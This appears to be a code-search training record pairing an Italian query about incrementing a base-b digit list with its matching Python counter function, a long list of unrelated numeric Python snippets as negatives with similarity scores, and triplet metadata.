[ "def Calcular(a: float) ->float:\n \n return (a*2)", "def p() -> float:\n return 0.9", "def f(x0: float, x1: float) -> float:\n return 8 - (x0 - 2) ** 2 - (x1 - 2) ** 2", "def p2f (p):\n #return 11000**((p+1)/2)\n #return (p+1)*11000\n return (p+1)*5500", "def p2f(self):\n\n stale = self.m_f\n self.m_f = self.v.b / self.m_v", "def _correct_p(self, f0, f1):\n return self.p * np.exp(self.dbeta * (f0 + f1) / 2)", "def f1(x, a, b):\n #return x**43 - b*x**42 + x**7 - x**6 * a + 84*x - 42 * b - 42 * a\n return (x**42 + 42)/(x-a) + (x**6 + 42)/(x-b)", "def erfc(x):\n return 0.0", "def f2b(self, fres, f):\n return f / fres", "def biseccion(func, a, b, tol=1e-4):\n p = (a + b) / 2 \n while np.fabs(func(p)) > tol:\n p = (a + b) / 2 \n if func(a) * func(p) < 0:\n b = p\n elif func(a) * func(p) > 0:\n a = p\n else:\n return p\n return p", "def sf(x, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n if x < 0:\n return mp.one\n if x > 1:\n return mp.zero\n return mp.betainc(a, b, x1=x, x2=1, regularized=True)", "def RegulaFalsiMethod(f, a=0.0, b=0.75, tol=1e-10):\n\tstart = time()\n\tf_a = f(a)\n\tf_b = f(b)\n\terror = tol + 1\n\t\n\terrs = []\n\ti = 0\n\n\twhile error > tol:\n\t\tx = (a*f_b - b*f_a) / (f_b - f_a)\n\t\tf_x = f(x)\n\n\t\terrs.append(error)\n\n\t\tif f_a*f_x > 0:\n\t\t\ta = x\n\t\t\tf_a = f_x\n\t\telif f_b*f_x > 0:\n\t\t\tb = x\n\t\t\tf_b = f_x\n\t\telse:\n\t\t\tbreak\n\n\t\terror = np.abs(f_x)\n\t\ti = i+1\n\tend = time()\n\treturn x, (end-start), i", "def f2p (f):\n #return 2*math.log(f, 11000) - 1\n #return f/11000 - 1\n return f/5500 - 1", "def _compute_f1(self, tp: torch.Tensor, fp: torch.Tensor,\n fn: torch.Tensor) -> float:\n precision = tp / (tp + fp).clamp(min=1e-8)\n recall = tp / (tp + fn).clamp(min=1e-8)\n f1 = 2 * precision * recall / (precision + recall).clamp(min=1e-8)\n return float(f1.mean())", "def F(self, t, x, **params):\n return 0.*x", "def b(q):\n if q == 0 or q == 1:\n return float(0.0)\n return -(q * log2(q) + (1 - q) * log2(1 - q))", "def f(self,un,tn):\n return -self.a(tn)*un + self.b(tn)", "def erf(x):\n return 0.0", "def F0(t):\n if (t < 1e-6):\n return 1.0 - t / 3.0\n else:\n return 0.5 * (np.pi / t) ** 0.5 * sp.erf(t ** 0.5)", "def calc_f1(precision: float, recall: float) -> float:\r\n return 2 * (precision * recall) / (precision + recall)", "def ft(t):\r\n ft = t ** (1.0 / 3.0) if t > 0.008856 else 7.787 * t + 4 / 29\r\n return ft", "def calculate_automation(f, t):\n return round(5 * f * t)", "def f0(E, fermi, T):\n return 1. / (1. + np.exp((E - fermi) / (k_B * T)))", "def ifrft(f, a):\n return frft(f, -a)", "def fla (mva, vnom):\r\n x=mva*1000000\r\n y=(vnom*1000)\r\n z=round(x/y,3)\r\n return z", "def fppp(x):\n return (-2000.00*math.cos(10.0.x+1))", "def c2f(t):\r\n return round(9*t/5 + 32)", "def f_value(a, b):\r\n if not any(a) or not any(b) or len(a) <= 1 or len(b) <= 1:\r\n raise ValueError(\"Vectors should contain more than 1 element\")\r\n F = var(a) / var(b)\r\n dfn = len(a) - 1\r\n dfd = len(b) - 1\r\n return dfn, dfd, F", "def f(a):\n b = a * 2\n while b.norm().asscalar() < 1000:\n b = b * 2\n if b.sum().asscalar() > 0:\n c = b\n else:\n c = 100 * b\n return c", "def BisectionMethod(f, a=0, b=1, tol=1e-10):\n\tstart = time()\n\tf_a = f(a)\n\tf_b = f(b)\n\t\n\t# Initialization of errors and iters\n\terrs = []\n\ti = 0\n\n\tif f_a == 0:\n\t\treturn a\n\telif f_b == 0:\n\t\treturn b\n\telif f_a*f_b > 0:\n\t\tprint(\"The function values have the same sign!\")\n\telse:\n\t\terror = b-a\n\t\twhile error > tol:\n\t\t\tc = (b+a)/2\n\t\t\tf_c = f(c)\n\t\t\t\n\t\t\terrs.append(error)\n\t\t\t\n\t\t\tif f_a*f_c > 0:\n\t\t\t\ta = c\n\t\t\t\tf_a = f_c\n\t\t\telif f_a*f_c < 0:\n\t\t\t\tb = c\n\t\t\t\tf_b = f_c\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\terror = b-a\n\t\t\ti = i+1\n\tend = time()\n\treturn c, (end-start), i", "def ftom(f):\n return 69 + 12 * log(f / 440.0, 2)", "def ret_f(t,y):\n\n f = np.zeros(3)\n f[0] = 77.27*(y(1) - y(0)*y(1)+ y(0)-8.375e-6*y(0)*y(0))\n f[1] = (1.0/77.27)*(-y(1)-y(0)*y(1)+y(2))\n f[2] = 0.161*(y(0)-y(2))\n\n return f", "def bisection(f,a,b,tol=1e-4,Max_trial=14):\n pvalues = np.zeros(Max_trial+3)\n fvalues = np.zeros(Max_trial+3)\n fa,fb = f(a),f(b)\n pvalues[0],pvalues[1]=a,b\n fvalues[0],fvalues[1]=fa,fb\n\n if fa*fb>0:\n print('f(a)*f(b)>0 ---> specified a and b do not work!')\n print('spiting out a or b --- whichever is closer')\n \n if np.abs(fa)<=fb:\n return a,f(a)\n else:\n return b,f(b)\n \n \n p=(a+b)/2\n pvalues[2]=p\n fp=f(p)\n fvalues[2]=fp\n err=np.abs(fp)\n\n j=0\n while err > tol and j<Max_trial:\n\n if fa*fp<0:\n b=p\n p=(a+b)/2\n fp = f(p)\n else:\n a=p\n fa = fp\n p=(a+b)/2\n fp = f(p)\n\n err=abs(fp)\n print('-------------------------------------------------------')\n print('bisection trial #'+str(j)+': sol='+str(p)+', mismatch ='+str(err))\n print('-------------------------------------------------------')\n j=j+1\n pvalues[j+2]=p\n fvalues[j+2]=fp\n # print('p='+str(p))\n # print('a,b='+str(a)+'--'+str(b))\n\n pvalues,fvalues=pvalues[:j+3],fvalues[:j+3]\n\n return pvalues,fvalues", "def bisection(f, fu, point_a, point_b, point_c, point_d, lower_bound, upper_bound, length):\n n = 1\n theta = 0\n a = lower_bound\n b = upper_bound\n while n <= 100:\n theta = (a + b) / 2.0\n if -1e-6 < f(fu(point_a, point_b, point_c, theta), point_d) - length < 1e-6:\n # print 'Residual', f(fu(point_a, point_b, point_c, theta), point_d) - length\n # print 'iteration', n\n return theta\n else:\n n = n + 1\n if f(fu(point_a, point_b, point_c, theta), point_d) - length > 0:\n b = theta\n else:\n a = theta\n\n print 'failedtheta', theta, 'Residual', f(fu(point_a, point_b, point_c, theta), point_d) - length\n print 'iteration', n\n return False", "def find_f_equals_1():\n f1 = scipy.optimize.brentq(f2, 0, -10)\n return f1", "def fpr(self):\n return float(self.fp) / (self.fp + self.tn) if self.tn != 0 else 1", "def f(z):\n a=1./(1.+z)\n #da=0.01\n da=0.01*a\n #da=1e-7\n gp,g,gm=[D(1./ia-1.) for ia in [a+da,a,a-da]]\n f=a*(gp-gm)/(2*g*da)\n #dz=0.01\n #gp,g,gm=[D(zi) for zi in [z+dz,z,z-dz]]\n #f=(z)*(gp-gm)/(2.*g*dz)\n return f", "def my_func(a,b):\n return (0.+a)*b", "def frexp(x):\n return 0.0, 0", "def f(t, T=2*np.pi):\n if t==0:\n return(0)\n if 0<t<T/2:\n return(1)\n if -T/2<t<0:\n return (-1)", "def B(q):\n # print('Value q')\n # print(q)\n if q > 0 and q != 0 and q != 1:\n result = -(q*math.log(q,2) + (1-q)*math.log(1-q,2))\n else:\n result = 0\n # print('Result of B')\n # print(result)\n return result", "def test_fixed_point_system(testFunctions, tol, printFlag): \n pass", "def fmod(x, y):\n return 0.0", "def test_bonferroni_correction(self):\r\n pvals = array([.1, .7, .5, .3, .9])\r\n exp = pvals * 5.\r\n obs = bonferroni_correction(pvals)\r\n self.assertFloatEqual(obs, exp)", "def bdq1(f, x, h=1e-5):\n return (f(x)-f(x-h))/h\n raise NotImplementedError(\"Problem 2 Incomplete\")", "def f(p, phi, phib, df):\n\treturn -log(p) - df + (p-1)*phi + \\\n\t ( phi*(1-p) + phib + \\\n\t 5./4*alpha*(phi*p)**(9./4)-(9./4)*alpha*(p*phi)**(5./4) - \\\n\t (1./2)(1-p*phi)**2 - (phib/Nb)-5./4*alpha*(phi+phib)**(9./4) + \\\n\t (9./4)*alpha*(phi+phib)**(5.4) + \\\n\t 1./2*(1-phi-phib)**2 ) * Ns", "def g(f, x: float):\n return lambda x: f(x + f(x)) / f(x) - 1", "def bCheck(c, v, p, b):\n val = (v+1).floor()\n deg = c.degree()\n coeffs = c.coefficients(sparse=False)\n lcoeff = coeffs[deg]; coeffs.remove(lcoeff)\n check1 = [(coeffs[i].valuation(p) - lcoeff.valuation(p))/(deg - i) for i in range(0,len(coeffs)) if coeffs[i] != 0]\n check2 = (val - lcoeff.valuation(p))/deg\n check1.append(check2)\n bval = min(check1)\n return (bval).ceil()", "def fpp(x):\n return (-200.0*math.sin(10.0*x+1.0))", "def sigma_xx_to_a_to_ff(self, Q, f):\n if f == \"e\":\n mf = me\n # gall = self.gaee\n elif f == \"mu\":\n mf = mmu\n # gall = self.gamumu\n mx = self.mx\n if Q >= 2.0 * mf and Q >= 2.0 * mx:\n # gaxx = self.gaxx\n # ma = self.ma\n # width_a = self.width_a\n ret_val = 0.0\n assert ret_val.imag == 0\n assert ret_val.real >= 0\n return ret_val.real\n else:\n return 0.0", "def def_mpf_constant(fixed):\n def f(prec, rnd=round_fast):\n wp = prec + 20\n v = fixed(wp)\n if rnd in (round_up, round_ceiling):\n v += 1\n return normalize(0, v, -wp, bitcount(v), prec, rnd)\n f.__doc__ = fixed.__doc__\n return f", "def f(m, x, b):\n return m*x + b", "def calculate(self) -> float:", "def _fv(self):\n return self.beta * (self.x ** self.c)", "def fpb(x, y):\n if y == 0:\n return x\n else:\n return fpb(y, (x % y))", "def fdq1(f, x, h=1e-5):\n return (f(x+h) - f(x))/h\n \n raise NotImplementedError(\"Problem 2 Incomplete\")", "def fabs(x):\n return 0.0", "def calculate_precision(num_tp, num_fp, num_fn):\n if (num_tp + num_fp) == 0:\n return 1\n else:\n return num_tp / (num_tp + num_fp)", "def mtof(p):\n return 440.0 * 2 ** ((p - 69) / 12.0)", "def calc_f_g(mu, x, t, ro, inv_a):\n z = inv_a*pow(x,2)\n f = 1 - pow(x,2)/ro*stump_C(z) \n g = t - 1/sqrt(mu)*pow(x,3)*stump_S(z)\n return f, g", "def p(e, t):\n return b * e ** 2", "def f(p, phi, phib, df):\n\treturn - p + exp( - df + Ns*(log((1 - p*phi)/(1 - phi - phib)) + \\\n\t\t(p - 1)*phi - phib + (9./4)*alpha*((phi + phib)**(5./4) - (p*phi)**(5./4))))", "def vf(gravedad, tiempo):\r\n #se realiza un multiplicacion y el valor se le asigna a la variable vf\r\n vf=gravedad*tiempo\r\n #se regresa vf\r\n return vf", "def test_fixed_point(testFunctions, tol, printFlag): \n pass", "def f1(x):\n return x**3 - 2*x + 2", "def get_transfer_fee(value: float) -> float:\n return (value * (0.99 / 100)) + 4.9", "def calculate_ft(self):\n \n # Create a function which is able to evaluate B**2\n ffunc = scipy.interpolate.interp1d(self.psigrid, self.e.getF()[self.tind])\n def b2_func(R, Z, psi):\n bt = ffunc(psi)/R\n br = -self.psifunc.ev(R, Z, dy=1)/R\n bz = self.psifunc.ev(R, Z, dx=1)/R\n \n return bt**2 + br**2 + bz**2\n \n\n def b_bmax2(R,Z,psi):\n b2 = b2_func(R,Z,psi)\n return b2 / np.max(b2)\n \n def b_bmax(R,Z,psi):\n return np.sqrt(b_bmax2(R,Z,psi))\n \n # Evaluate the flux-surface averaged h^2 and h, as required\n fsa_h2 = self.fs_average(b_bmax2)\n fsa_h = self.fs_average(b_bmax)\n \n # This is the function which gets flux-surface averaged in equation (7)\n def ftl_func(R,Z,psi):\n h = b_bmax(R,Z,psi)\n h2 = b_bmax2(R,Z,psi)\n \n return (1 - (np.sqrt(1 - h) * (1 + 0.5 * h)))/h2\n \n \n # Equation 6, 7 in Lin-Liu\n fs_ftu = 1 - fsa_h2 / fsa_h**2 * (1 - np.sqrt(1 - fsa_h) * (1 + 0.5 * fsa_h))\n fs_ftl = 1 - fsa_h2 * self.fs_average(ftl_func)\n # Equation 18, 19 \n om = 0.75\n self.fs_ft = om*fs_ftu + (1-om)*fs_ftl", "def comp_f1(precision, recall):\n return 2. * recall * precision / (recall + precision) \\\n if (recall + precision) > 0. else 0.", "def modf(x):\n return 0.0, 0.0", "def f(self,node):\r\n return (self.a*self.nodeDegree(node))/(1+self.b*self.nodeDegree(node))", "def test_hof(a, b):\n def f(g, x):\n return g(x) * g(x + 10.0)\n\n def g(x):\n return x * b\n\n return f(g, a) + f(g, b)", "def _calc_ft(Tci, Thi, Tco, Tho, N_shells) -> 'ft':\n if (Tco - Tci)/Tco < 0.01 or (Thi-Tho)/Tho < 0.01:\n return 1\n try:\n return ht.F_LMTD_Fakheri(Thi, Tho, Tci, Tco,\n shells=N_shells)\n except ValueError:\n return 0.6 # Accounts for worst case scenario", "def getFPSA2(ChargeSA):\n temp=0.0\n for i in ChargeSA:\n temp=temp+i[2]\n if temp == 0.0:\n return 0.0\n else:\n return getPPSA2(ChargeSA)/temp", "def f(t,x,p,q):\n return p[1] + q[0]*x", "def rkf( f, a, b, x0, tol, hmax, hmin ):\n\n # Coefficients used to compute the independent variable argument of f\n\n a2 = 2.500000000000000e-01 # 1/4\n a3 = 3.750000000000000e-01 # 3/8\n a4 = 9.230769230769231e-01 # 12/13\n a5 = 1.000000000000000e+00 # 1\n a6 = 5.000000000000000e-01 # 1/2\n\n # Coefficients used to compute the dependent variable argument of f\n\n b21 = 2.500000000000000e-01 # 1/4\n b31 = 9.375000000000000e-02 # 3/32\n b32 = 2.812500000000000e-01 # 9/32\n b41 = 8.793809740555303e-01 # 1932/2197\n b42 = -3.277196176604461e+00 # -7200/2197\n b43 = 3.320892125625853e+00 # 7296/2197\n b51 = 2.032407407407407e+00 # 439/216\n b52 = -8.000000000000000e+00 # -8\n b53 = 7.173489278752436e+00 # 3680/513\n b54 = -2.058966861598441e-01 # -845/4104\n b61 = -2.962962962962963e-01 # -8/27\n b62 = 2.000000000000000e+00 # 2\n b63 = -1.381676413255361e+00 # -3544/2565\n b64 = 4.529727095516569e-01 # 1859/4104\n b65 = -2.750000000000000e-01 # -11/40\n\n # Coefficients used to compute local truncation error estimate. These\n # come from subtracting a 4th order RK estimate from a 5th order RK\n # estimate.\n\n r1 = 2.777777777777778e-03 # 1/360\n r3 = -2.994152046783626e-02 # -128/4275\n r4 = -2.919989367357789e-02 # -2197/75240\n r5 = 2.000000000000000e-02 # 1/50\n r6 = 3.636363636363636e-02 # 2/55\n\n # Coefficients used to compute 4th order RK estimate\n\n c1 = 1.157407407407407e-01 # 25/216\n c3 = 5.489278752436647e-01 # 1408/2565\n c4 = 5.353313840155945e-01 # 2197/4104\n c5 = -2.000000000000000e-01 # -1/5\n\n # Set t and x according to initial condition and assume that h starts\n # with a value that is as large as possible.\n \n t = a\n x = numpy.array(x0)\n h = hmax\n\n # Initialize arrays that will be returned\n\n T = numpy.array( [t] )\n X = numpy.array( [x] )\n \n while t < b:\n\n # Adjust step size when we get to last interval\n\n if t + h > b:\n h = b - t;\n\n # Compute values needed to compute truncation error estimate and\n # the 4th order RK estimate.\n\n k1 = h * f( x, t )\n k2 = h * f( x + b21 * k1, t + a2 * h )\n k3 = h * f( x + b31 * k1 + b32 * k2, t + a3 * h )\n k4 = h * f( x + b41 * k1 + b42 * k2 + b43 * k3, t + a4 * h )\n k5 = h * f( x + b51 * k1 + b52 * k2 + b53 * k3 + b54 * k4, t + a5 * h )\n k6 = h * f( x + b61 * k1 + b62 * k2 + b63 * k3 + b64 * k4 + b65 * k5, \\\n t + a6 * h )\n\n # Compute the estimate of the local truncation error. If it's small\n # enough then we accept this step and save the 4th order estimate.\n \n r = abs( r1 * k1 + r3 * k3 + r4 * k4 + r5 * k5 + r6 * k6 ) / h\n if len( numpy.shape( r ) ) > 0:\n r = max( r )\n if r <= tol:\n t = t + h\n x = x + c1 * k1 + c3 * k3 + c4 * k4 + c5 * k5\n T = numpy.append( T, t )\n X = numpy.append( X, [x], 0 )\n\n # Now compute next step size, and make sure that it is not too big or\n # too small.\n\n h = h * min( max( 0.84 * ( tol / r )**0.25, 0.1 ), 4.0 )\n\n if h > hmax:\n h = hmax\n elif h < hmin:\n raise RuntimeError(\"Error: Could not converge to the required tolerance %e with minimum stepsize %e.\" % (tol,hmin))\n break\n # endwhile\n\n return ( T, X )", "def test_c2f():\n assert temperatura.c2f(3) == 37.4", "def u_exact(t):\n return a * t + b", "def friction_factor(v1: \"int\", v2: \"int\") -> \"int\":", "def find_zero(f, df):\n def near_zero(x):\n return approx_eq(f(x), 0)\n return improve(newton_update(f, df), near_zero)", "def compute_a(P, T14, rp, b):\n _a = P / np.pi / T14 * np.sqrt( (1+ rp)**2 - b )\n return _a", "def _fadefunc(self, t):\r\n return t * t * t * (t * (t * 6 - 15) + 10)", "def mtbf(self, up_time, failures=1, dec_point=3):\n self.up_time = up_time\n self.failures = failures\n self.dec_point = dec_point\n mt_bf = round(float(up_time / failures),dec_point)\n return mt_bf", "def calculate_f(f, s = None, f_err = None, s_err = None, scale = 1000):\n if s is None:\n return f, f_err\n else:\n f0 = f * s / gamma(1./s)\n if (f_err is not None) and (s_err is not None):\n sigma = np.sqrt(f_err ** 2 + ((s + polygamma(0, 1/s))/s/gamma(1/s)* s_err)**2)\n else:\n sigma = None\n return f0, sigma", "def f(t, v):\n dSdt = - (a * v[1] * v[0]) / N\n dUdt = (a * v[1] * v[0]) / N - c * v[1]\n dQdt = c * v[1] - b * v[2]\n dCdt = b * v[2]\n return [dSdt, dUdt, dQdt, dCdt]", "def compute_f_score(alpha, true_positves, false_positives, false_negatives):\n num = true_positves\n den = np.float64(alpha * (true_positves + false_positives) +\\\n (1 - alpha) * (true_positves + false_negatives))\n with np.errstate(divide='ignore', invalid='ignore'):\n return num / den", "def f(y):\n \n\n k = 1.0\n return y*(1-y)", "def _F(x,gam):\n beta = np.sqrt(1 - gam**-2)\n B = 1 + 0.5 * (gam**2 - 1)\n C = 10 * x * gam * beta * (2 + gam * beta)\n C /= 1 + x**2 * (gam**2 - 1)\n\n F_1 = (17 - 3 * x**2 / (2 - x)**2 - C) * np.sqrt(1 - x)\n F_2 = 12 * (2 -x) - 7 * x**2 / (2 - x) - 3 * x**4 / (2 - x)**3\n F_3 = np.log((1 + np.sqrt(1 - x)) / np.sqrt(x))\n\n return B * F_1 + F_2 * F_3", "def f_raw(x, a, b):\n return a * x + b", "def test_partial_derivative_f1(self):\r\n # Verified with Wolfram Alpha.\r\n\r\n # f2 > 0\r\n obs = self.estimator1._partial_derivative_f1(2, 3, 10, 42)\r\n assert_almost_equal(obs, 1.22672908818)\r\n\r\n # f2 == 0\r\n obs = self.estimator1._partial_derivative_f1(2, 0, 10, 42)\r\n assert_almost_equal(obs, 1.272173492918482)\r\n\r\n # f1 == 0, f2 == 0\r\n obs = self.estimator1._partial_derivative_f1(0, 0, 10, 42)\r\n assert_almost_equal(obs, 1.2961664362634027)", "def pi_het(dose,p,a,b,eps):\n \n small=0.001\n return((1-(quad(f_beta,0,0+small,args=(dose,p,a,b),full_output=1)[0]+quad(f_beta,0+small,1-small,args=(dose,p,a,b),full_output=1)[0]+quad(f_beta,1-small,1,args=(dose,p,a,b),full_output=1)[0]))*(1-eps))", "def calc_pr_rc_F1(GTD, block_occ):\r\n true_pos = ((GTD + block_occ)==2).sum()\r\n false_pos = sum([1 if BI_val==1 and GTD[i]==0 else 0 for i, BI_val in enumerate(block_occ.values)])\r\n precision = float(true_pos/(true_pos+false_pos))\r\n recall = float(true_pos/(GTD.sum()))\r\n if precision == 0:\r\n F1 = 0\r\n else:\r\n F1 = float(2 * (precision * recall) / (precision + recall))\r\n \r\n return precision, recall, F1", "def romberg(f, a, b, n=20):\n R = [[0.5 * (b - a) * (f(a) + f(b))]] # R[0][0]\n for n in range (1,n+1):\n h = float(b-a)/2**n\n R.append((n+1)*[None]) # Add an empty row.\n R[n][0] = 0.5*R[n-1][0] + h*sum(f(a+(2*k-1)*h) for k in range(1, 2**(n-1)+1)) # for proper limits\n for m in range(1, n+1):\n R[n][m] = R[n][m-1] + (R[n][m-1] - R[n-1][m-1]) / (4**m - 1)\n return R[n][n]", "def F(x):\n return math.exp(-0.5 * (x ** 2))", "def bspe(a, b):\n if b-a == 1:\n return MPZ_ONE, MPZ(b)\n m = (a+b)//2\n p1, q1 = bspe(a, m)\n p2, q2 = bspe(m, b)\n return p1*q2+p2, q1*q2", "def get_delta_v_tot(f, e, a, P):\n\n coeff = (2.0*np.pi/P) * a / np.sqrt(1.0 - e*e)\n delta_v_tot = coeff * (1.0 + 2.0*e*np.cos(f) + e*e) / 1.0e5\n\n return delta_v_tot", "def agm_fixed(a, b, prec):\n i = 0\n while 1:\n anew = (a+b)>>1\n if i > 4 and abs(a-anew) < 8:\n return a\n b = isqrt_fast(a*b)\n a = anew\n i += 1\n return a", "def float(x) -> float:\n pass", "def TestFunc2(x):\r\n return 10*(-0.02*x[0] + 0.5*x[0]*x[0] + x[1])**2 \\\r\n + 128*(-0.02*x[0] + 0.5*x[0]*x[0] - x[1]/4) \\\r\n - (8e-5)*x[0]", "def beat_division(a,b):\n if b == 0:\n return 0\n return a // b", "def force(m: float, a):\n return m * a" ]
[ "0.65174574", "0.6448639", "0.63864565", "0.6370828", "0.6296283", "0.6275515", "0.6270769", "0.6238707", "0.6191305", "0.61809313", "0.618049", "0.6167555", "0.6149057", "0.61406493", "0.61188513", "0.6118763", "0.61178863", "0.60342443", "0.6006515", "0.6004016", "0.6002765", "0.59564394", "0.5937206", "0.5922853", "0.59220946", "0.5883357", "0.5857809", "0.5855197", "0.5830326", "0.582943", "0.5827883", "0.5819967", "0.5819277", "0.58018", "0.5778498", "0.5778282", "0.5772813", "0.57632977", "0.5759403", "0.5759196", "0.5756759", "0.57378423", "0.5728657", "0.572825", "0.5717819", "0.571659", "0.57163197", "0.5706786", "0.5701919", "0.5698739", "0.5687975", "0.5681937", "0.5681592", "0.5678373", "0.56754833", "0.5672732", "0.5668723", "0.566598", "0.5659324", "0.5639906", "0.56381243", "0.56302893", "0.5624189", "0.56020206", "0.56013983", "0.56005806", "0.5590434", "0.55809176", "0.5579702", "0.55767506", "0.5576739", "0.55706793", "0.55588067", "0.5556957", "0.5556457", "0.55536306", "0.55520433", "0.555108", "0.55419314", "0.55414003", "0.5540328", "0.55350614", "0.55345714", "0.5530873", "0.55291164", "0.55273306", "0.5522553", "0.5514987", "0.551164", "0.55065113", "0.5502785", "0.5499345", "0.54956365", "0.549539", "0.5490186", "0.54893154", "0.54864293", "0.5485876", "0.54826945", "0.54810965" ]
0.6965852
0
Incrementa la lista l intesa come numero (sequenza di cifre) contando in base b
def counter(l,b): if l == [b-1]*len(l): return i = 1 while(True): if l[-i] < b-1: l[-i] += 1 break else: l[-i] = 0 i += 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def increment(b): \n if b == 11111111:\n return 00000000\n else:\n b = bin_to_dec(b)\n b = b + 1\n res = dec_to_bin (b)\n if len(res) == 8:\n return res\n else:\n c = 8 - len(res)\n return c*'0' + res", "def next_num():\r\n CHModuleFactory.num += 1\r\n return CHModuleFactory.num", "def next_num():\r\n CHModuleFactory.num += 1\r\n return CHModuleFactory.num", "def incr(val):\r\n n = len(val)\r\n num = int(val, 2)\r\n num += 1\r\n num = bin(num)[2:]\r\n while len(num)<n:\r\n num = '0' + num\r\n return num[len(num)-n:]", "def gera_num_cc(abv):\n \n # Ao recebermos a indicacao de que entidade se pretende gerar um numero, usamos a funcao auxiliar escolhe_iin_comp para escolher aleatoriamente os digitos iniciais e o comprimento do cartao.\n # O numero final comeca por ser os digitos iniciais, juntando a estes, do lado direito, numeros aleatorios ate chegarmos ao comprimento pretendido menos 1. O ultimo digito sera o digito de verificacao.\n \n dig_iniciais , comp = escolhe_iin_comp(abv) \n num_cc = dig_iniciais\n \n for i in range(comp-len(dig_iniciais)-1): \n num_cc = num_cc + str(int(random()*10)) \n \n num_cc = num_cc + digito_verificacao(num_cc)\n \n return int(num_cc)", "def increment_number(self):\n # self.number += 1\n print('fuckwit')\n # print(self.number)", "def increment_counter(self) -> None:", "def ToBase(b, n):\r\n d = []\r\n while n:\r\n d.append(n % b)\r\n n //= b\r\n d.reverse() \r\n return int(''.join(map(str, d)))", "def increase_seq(sequence_number):\n\n sequence_number += 1\n if sequence_number > 0xFFFF:\n sequence_number = 1\n\n return sequence_number", "def next_num(cls):\r\n cls.num += 1\r\n return cls.num", "def inc_num(num):\n return num + 1", "def inc(i):\n i += 1\n return i", "def calc_rec_cycle(number):\n result = 0\n i = 10 ** (int(math.log10(number)) + 1)\n s = set()\n\n while True:\n if i == number or i == 0:\n result = 0\n break\n\n if i < number:\n result += 1\n i *= 10\n continue\n\n # i > n\n r = i % number\n #print('r',r)\n if r not in s:\n result += 1\n s.add(r)\n else:\n break\n\n i = r * 10\n return result", "def increase_counter(self):\n self.values = self.values + 1", "def E_inc(self):\n\n\t\tmaxit = self.num_data + 100\n\n\t\tfor i in range(maxit):\n\t\t\tsqB", "def add_and_allocate_number(self, cb: t.Callable[[EPOLL], None]) -> int:\n number = self.next_number\n # TODO technically we should allocate the lowest unused number\n self.next_number += 1\n self.number_to_cb[number] = cb\n return number", "def fibonacci_number_counter(p):\r\n if p == 0:\r\n return 0\r\n elif p == 1 or p == 2:\r\n return 1\r\n else:\r\n fibonacci_list = [1, 1]\r\n while len(fibonacci_list) < p:\r\n fibonacci_list.append(fibonacci_list[-1] + fibonacci_list[-2])\r\n\r\n return fibonacci_list[-1]", "def int_to_base(n: int, b: int) -> List[int]:\n if n == 0:\n return [0]\n digits = []\n while n:\n digits.append(int(n % b))\n n //= b\n return digits[::-1]", "def renumber():\n\n counter = itertools.count(1)\n while True:\n yield 's%s'%counter.next()", "def increment(val):\n return coerce_to_int(val) + 1", "def next_sequence_num(buf=[0]): # use list as default value to make sure it is\n # initialized only once\n val = buf[0]\n buf[0] += 1\n return val", "def leo_numbers(countt:int, templist=[1,1])->int:\n if countt < 0:\n print(\"Первый аргумент этой функции - натуральное число\")\n elif not (countt or countt-1):\n return 1\n elif countt < len(L):\n return L[countt]\n else:\n while len(L) <= countt:\n L.append(L[-1]+L[-2]+1)\n return L[-1]", "def to_int(a):\n i = 0\n while a:\n i += 1\n a = a.next\n return i", "def next_int(self):\n self.innovation_number += 1\n return self.innovation_number", "def incr(n=1):\n for i in xrange(n):\n pulse_hi(INCR)", "def addNbr (self) :\n #we pick out the random number : 2 or 4\n if random.randint(1,10) == 1:\n randomNbr = 4\n else :\n randomNbr = 2\n\n #we pick a random position for the number\n emptyCounter = 0\n for k in range (4) :\n for i in range (4) :\n if self.grid[k,i] == 0 :\n emptyCounter += 1\n\n randomPosition = random.randint(0,emptyCounter-1)\n counter = 0\n for k in range (4) :\n for i in range (4) :\n if self.grid[k,i] == 0 :\n if (counter == randomPosition) :\n self.grid[k,i] = randomNbr\n return #we leave the function\n counter += 1", "def fibbonachi(num):\n a = 1\n b = 2\n fib = [a, b]\n c = a + b\n while c < num:\n fib.append(c)\n a, b = b, c\n c = a + b\n return fib", "def increment(sequence, seq):\n seq.rollover_len = len(sequence) + 1\n seq.value = sequence[::-1]\n return (SeqGen.next(seq)[::-1])", "def inc_tcp_seq_number(cur_seq: int, inc_by: int) -> int:\n if cur_seq < 0:\n return None\n return (cur_seq + inc_by) % SEQ_NUM_MOD_CONST", "def fibonacci(a):\n fib = [1,1]\n x = 0\n i = 1\n while x < a:\n x = fib [i] + fib[i-1]\n i += 1\n fib.append(x)\n return i, fib", "def calee(num):\n state.inc(num)\n print(\"caleee\")", "def add(iA, iB):\n for i in range(iB):\n iA = iA + 1", "def TransformBase(base:int, number:list, digts:int) -> int :\n i = 0\n res = 0\n while ( i < digts):\n index = digts - i - 1\n number[index] = int(number[index]) * (base ** i) \n res += number[index]\n i += 1\n return res", "def inc(self):\n self._value += 1", "def increase_count(self, number=1):\n self.count += number", "def inc(self):\n \n self.count += 1", "def fibonacci_iterative(nth_nmb: int) -> int:\n old, new = 0, 1\n if nth_nmb in (0, 1):\n return nth_nmb\n for __ in range(nth_nmb - 1):\n old, new = new, old + new\n return new", "def increment(self):\r\n return self.add(1)", "def gen_numb(N:int, M:int, prefix = None):\n\tprefix = prefix or []\n\tif M == 0:\n\t\tprint(prefix)\n\t\treturn\n\tfor digit in range(N):\n\t\tprefix.append(digit)\n\t\tgen_numb(N, M-1, prefix)\n\t\tprefix.pop()", "def inc( self ):\n self.count += 1", "def gen_num(lim=10000):\n n = 1\n yield 2\n yield 3\n while 6 * n + 1 <= lim:\n yield 6 * n - 1\n yield 6 * n + 1\n n += 1", "def fibonacci(num):\n sequence = [1, 1]\n for x in range(num-2):\n sequence.append(sequence[x] + sequence[x+1])\n return sequence", "def fibonacci(n):", "def fibonacci():\n yield 0\n element = yield 1\n previous = element\n while element < 1e100:\n current = yield element\n element = previous + current\n if current > 1:\n previous = current\n\n return element", "def numbers(num):\n r = []\n for i in range(num):\n d = len(r)\n r = [1 if i == 0 or i == d else r[i-1]+r[i] for i in range(d+1)]\n yield r", "def codage(nbr):\n\tmask=1\n\tresult=0\n\tfor index in range(len(G)):\n\t\tif ((mask<<index)&nbr) != 0:\n\t\t\tresult^=G[len(G)-index-1]\n\treturn result", "def postfix_increment(self) -> int:\n result = self._counter\n if self._counter < self._max_value:\n self._counter += 1\n return result", "def increment(self, 